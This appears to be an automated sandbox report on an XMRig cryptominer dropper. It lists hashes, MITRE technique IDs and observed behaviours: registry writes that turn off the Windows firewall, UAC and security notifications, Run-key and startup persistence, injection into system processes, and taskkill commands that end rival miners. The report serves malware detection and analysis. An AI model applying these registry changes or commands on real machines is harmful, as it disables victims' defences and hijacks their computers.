xmrig | 2bfe501031c14858507f0cc09a4312ca438b521f16fa83e90f93b067a929aaab

Analysis

max time kernel
41s
max time network
577s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 22:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Size

2.3MB
MD5

921379bd587ab29da4dc23fb9d47fe36
SHA1

e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA256

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA512

90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Score

10^/10

xmrig evasion miner persistence trojan upx

Malware Config

Signatures

Modifies firewall policy service 2 TTPs 6 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	VID001.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
behavioral3/memory/3100-32-0x0000000000400000-0x00000000009E7000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

VID001.exe

pid process

2756 VID001.exe

pid	process
2756	VID001.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral3/memory/1108-2-0x0000000002360000-0x00000000033EE000-memory.dmp	upx
behavioral3/memory/2756-9-0x00000000022E0000-0x000000000336E000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

VID001.exe

pid process

2756 VID001.exe
Drops startup file 1 IoCs

Processes:

VID001.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk VID001.exe
Loads dropped DLL 2 IoCs

Processes:

VID001.exe

pid process

2756 VID001.exe
2756 VID001.exe

pid	process
2756	VID001.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	VID001.exe

pid	process
2756	VID001.exe
2756	VID001.exe

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	VID001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

VID001.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	VID001.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VID001.exe

description	ioc	process
File opened (read-only)	\??\M:	VID001.exe
File opened (read-only)	\??\N:	VID001.exe
File opened (read-only)	\??\Q:	VID001.exe
File opened (read-only)	\??\S:	VID001.exe
File opened (read-only)	\??\V:	VID001.exe
File opened (read-only)	\??\X:	VID001.exe
File opened (read-only)	\??\Y:	VID001.exe
File opened (read-only)	\??\H:	VID001.exe
File opened (read-only)	\??\J:	VID001.exe
File opened (read-only)	\??\L:	VID001.exe
File opened (read-only)	\??\T:	VID001.exe
File opened (read-only)	\??\U:	VID001.exe
File opened (read-only)	\??\W:	VID001.exe
File opened (read-only)	\??\R:	VID001.exe
File opened (read-only)	\??\E:	VID001.exe
File opened (read-only)	\??\F:	VID001.exe
File opened (read-only)	\??\G:	VID001.exe
File opened (read-only)	\??\I:	VID001.exe
File opened (read-only)	\??\K:	VID001.exe
File opened (read-only)	\??\O:	VID001.exe
File opened (read-only)	\??\P:	VID001.exe
File opened (read-only)	\??\Z:	VID001.exe

Drops file in Windows directory 1 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description ioc process

File opened for modification C:\Windows\SYSTEM.INI 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\SYSTEM.INI	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_2

Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

1232 net.exe
1556 net.exe
3708 net.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4004 taskkill.exe
3024 taskkill.exe
2160 taskkill.exe
3520 taskkill.exe
Runs net.exe

pid	process
1232	net.exe
1556	net.exe
3708	net.exe

pid	process
4004	taskkill.exe
3024	taskkill.exe
2160	taskkill.exe
3520	taskkill.exe

Runs ping.exe 1 TTPs 35 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1792	PING.EXE
1144	PING.EXE
1328	PING.EXE
2072	PING.EXE
1212	PING.EXE
2828	PING.EXE
3900	PING.EXE
3232	PING.EXE
1832	PING.EXE
3264	PING.EXE
3880	PING.EXE
2728	PING.EXE
1308	PING.EXE
2028	PING.EXE
1692	PING.EXE
3120	PING.EXE
2960	PING.EXE
1256	PING.EXE
3812	PING.EXE
1604	PING.EXE
1288	PING.EXE
3364	PING.EXE
4044	PING.EXE
2100	PING.EXE
1700	PING.EXE
2696	PING.EXE
412	PING.EXE
1348	PING.EXE
3356	PING.EXE
3116	PING.EXE
1892	PING.EXE
3640	PING.EXE
3776	PING.EXE
2548	PING.EXE
1160	PING.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

pid	process
1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe
2756	VID001.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	pid	process
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe
Token: SeDebugPrivilege	2756	VID001.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	pid	process	target process
PID 1108 wrote to memory of 716	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	fontdrvhost.exe
PID 1108 wrote to memory of 724	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	fontdrvhost.exe
PID 1108 wrote to memory of 976	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	dwm.exe
PID 1108 wrote to memory of 2640	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	sihost.exe
PID 1108 wrote to memory of 2664	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	svchost.exe
PID 1108 wrote to memory of 2852	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	taskhostw.exe
PID 1108 wrote to memory of 2396	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	Explorer.EXE
PID 1108 wrote to memory of 3312	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	ShellExperienceHost.exe
PID 1108 wrote to memory of 3328	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	SearchUI.exe
PID 1108 wrote to memory of 3548	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	RuntimeBroker.exe
PID 1108 wrote to memory of 3736	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	DllHost.exe
PID 1108 wrote to memory of 2756	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1108 wrote to memory of 2756	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1108 wrote to memory of 2756	1108	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 2756 wrote to memory of 716	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 724	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 976	2756	VID001.exe	dwm.exe
PID 2756 wrote to memory of 2640	2756	VID001.exe	sihost.exe
PID 2756 wrote to memory of 2664	2756	VID001.exe	svchost.exe
PID 2756 wrote to memory of 2852	2756	VID001.exe	taskhostw.exe
PID 2756 wrote to memory of 2396	2756	VID001.exe	Explorer.EXE
PID 2756 wrote to memory of 3312	2756	VID001.exe	ShellExperienceHost.exe
PID 2756 wrote to memory of 3328	2756	VID001.exe	SearchUI.exe
PID 2756 wrote to memory of 3548	2756	VID001.exe	RuntimeBroker.exe
PID 2756 wrote to memory of 3736	2756	VID001.exe	DllHost.exe
PID 2756 wrote to memory of 3812	2756	VID001.exe	DllHost.exe
PID 2756 wrote to memory of 716	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 724	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 976	2756	VID001.exe	dwm.exe
PID 2756 wrote to memory of 2640	2756	VID001.exe	sihost.exe
PID 2756 wrote to memory of 2664	2756	VID001.exe	svchost.exe
PID 2756 wrote to memory of 2852	2756	VID001.exe	taskhostw.exe
PID 2756 wrote to memory of 2396	2756	VID001.exe	Explorer.EXE
PID 2756 wrote to memory of 3312	2756	VID001.exe	ShellExperienceHost.exe
PID 2756 wrote to memory of 3328	2756	VID001.exe	SearchUI.exe
PID 2756 wrote to memory of 3548	2756	VID001.exe	RuntimeBroker.exe
PID 2756 wrote to memory of 3736	2756	VID001.exe	DllHost.exe
PID 2756 wrote to memory of 1736	2756	VID001.exe	backgroundTaskHost.exe
PID 2756 wrote to memory of 716	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 724	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 976	2756	VID001.exe	dwm.exe
PID 2756 wrote to memory of 2640	2756	VID001.exe	sihost.exe
PID 2756 wrote to memory of 2664	2756	VID001.exe	svchost.exe
PID 2756 wrote to memory of 2852	2756	VID001.exe	taskhostw.exe
PID 2756 wrote to memory of 2396	2756	VID001.exe	Explorer.EXE
PID 2756 wrote to memory of 3312	2756	VID001.exe	ShellExperienceHost.exe
PID 2756 wrote to memory of 3328	2756	VID001.exe	SearchUI.exe
PID 2756 wrote to memory of 3548	2756	VID001.exe	RuntimeBroker.exe
PID 2756 wrote to memory of 3736	2756	VID001.exe	DllHost.exe
PID 2756 wrote to memory of 1736	2756	VID001.exe	backgroundTaskHost.exe
PID 2756 wrote to memory of 716	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 724	2756	VID001.exe	fontdrvhost.exe
PID 2756 wrote to memory of 976	2756	VID001.exe	dwm.exe
PID 2756 wrote to memory of 2640	2756	VID001.exe	sihost.exe
PID 2756 wrote to memory of 2664	2756	VID001.exe	svchost.exe
PID 2756 wrote to memory of 2852	2756	VID001.exe	taskhostw.exe
PID 2756 wrote to memory of 2396	2756	VID001.exe	Explorer.EXE
PID 2756 wrote to memory of 3312	2756	VID001.exe	ShellExperienceHost.exe
PID 2756 wrote to memory of 3328	2756	VID001.exe	SearchUI.exe
PID 2756 wrote to memory of 3548	2756	VID001.exe	RuntimeBroker.exe
PID 2756 wrote to memory of 3736	2756	VID001.exe	DllHost.exe
PID 2756 wrote to memory of 1736	2756	VID001.exe	backgroundTaskHost.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:724

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3736

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3548

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3328

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2396

C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
2⤵
- Modifies firewall policy service
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1108

C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
4⤵
PID:876

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuCNMiner*
5⤵
- Kills process with taskkill
PID:4004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im IMG0*
5⤵
- Kills process with taskkill
PID:3520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
4⤵
PID:1940

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im uihost*
5⤵
- Kills process with taskkill
PID:3024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DOC0*
5⤵
- Kills process with taskkill
PID:2160

C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
